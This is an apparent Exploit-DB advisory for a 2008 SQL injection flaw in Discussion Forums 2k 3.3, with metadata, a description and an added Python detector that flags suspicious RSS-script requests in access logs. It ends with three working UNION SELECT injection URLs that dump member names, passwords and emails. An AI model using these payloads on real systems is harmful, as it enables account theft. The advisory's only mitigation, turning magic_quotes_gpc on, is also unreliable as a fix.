Vendor: Discussion Forums 2k
By: ~!Dok_tOR!~
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Discussion Forums 2k
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:berlios:discussion_forums_2k
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Discussion Forums 2k SQL Injection

The Discussion Forums 2k application is vulnerable to multiple SQL injection attacks when magic_quotes_gpc is set to Off. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. The malicious queries can be sent via the 'CatID', 'id', and 'SubID' parameters in the 'RSS1.php', 'RSS2.php', and 'RSS5.php' scripts respectively.

Mitigation:

Ensure that the application is not vulnerable to SQL injection attacks by setting the 'magic_quotes_gpc' parameter to 'On'.
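
A detection check for the requests described above, as an added example that is not part of the original advisory: it flags access-log requests to the three RSS scripts whose CatID, id or SubID value is not a plain integer. The combined log format, the integer-only rule for these parameters, the /forum path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters named in the advisory and its three URLs.
WATCHED = {
    "rss1.php": {"CatID"},
    "rss2.php": {"id", "CatID"},
    "rss5.php": {"SubID"},
}
# Assumption: legitimate values are short non-negative integers.
VALID_ID = re.compile(r"\d{1,10}")
# Assumption: combined-format access log with the request line in quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return (script, param, decoded value) for each watched non-integer ID."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    hits = []
    # parse_qsl decodes %xx and '+', so encoded payloads are compared decoded.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and not VALID_ID.fullmatch(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Return (line_number, hits) for every log line with at least one hit."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = suspicious_params(line)
        if hits:
            results.append((number, hits))
    return results

# Constructed sample log lines (documentation IPs, hypothetical /forum path).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2008:10:00:01 +0000] "GET /forum/misc/RSS1.php?CatID=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Oct/2008:10:00:05 +0000] "GET /forum/misc/RSS1.php?CatID=-1)+union+select+1,2,3,4,5,6,7/* HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Oct/2008:10:00:09 +0000] "GET /forum/misc/RSS2.php?id=1&CatID=-1%29+union+select+user%28%29/* HTTP/1.1" 200 640',
    '203.0.113.7 - - [01/Oct/2008:10:00:12 +0000] "GET /forum/misc/RSS5.php?SubID=12 HTTP/1.1" 200 4090',
    '203.0.113.7 - - [01/Oct/2008:10:00:15 +0000] "GET /forum/index.php?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```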

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: Discussion Forums 2k
Version: 3.3
URL: http://developer.berlios.de/projects/df2k/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/misc/RSS1.php?CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5,6,7+from+DF2k_Members/*

Exploit 2:

http://localhost/[installdir]/misc/RSS2.php?id=1&CatID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,user(),4,5,6,7,8,9,10+from+DF2k_Members/*

Exploit 3:

http://localhost/[installdir]/misc/RSS5.php?SubID=-1)+union+select+concat_ws(0x3a,Name,Password,Email),2,3,4,5+from+DF2k_Members/*

# milw0rm.com [2008-10-01]